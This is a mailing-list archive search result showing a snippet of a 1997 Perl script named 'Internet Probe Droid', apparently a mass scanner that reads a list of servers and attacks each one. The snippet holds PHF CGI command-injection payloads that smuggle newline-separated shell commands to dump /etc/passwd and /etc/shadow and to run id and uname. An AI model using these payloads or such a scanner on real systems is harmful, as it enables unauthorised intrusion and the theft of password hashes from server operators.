search for: really_dumb_sit

Displaying 1 result from an estimated 1 matches for "really_dumb_sit".

Did you mean: really_dumb_sites
1997 Sep 28
0
[IPD] Internet Probe Droid
...;fh000"; # filehandle variable $queries = ''/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd%0aecho%20ImPrDr%0aid%0aecho%20ImPrDr%0auname%20-a''; $getShadow = ''/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow''; ### ## # Begin main &banner(); # just to be anal @really_dumb_sites = (); $tried = $listlength = $totalgotten = $rootservers = $shadowed = 0; # Get server list. unless ($ARGV[0]) { die "Usage: ipd.pl <server list>\n"; } open(SERVERS, "$ARGV[0]") or die "Cannot read server list: $!\n"; @servers = <SERVERS>; close SERVERS;...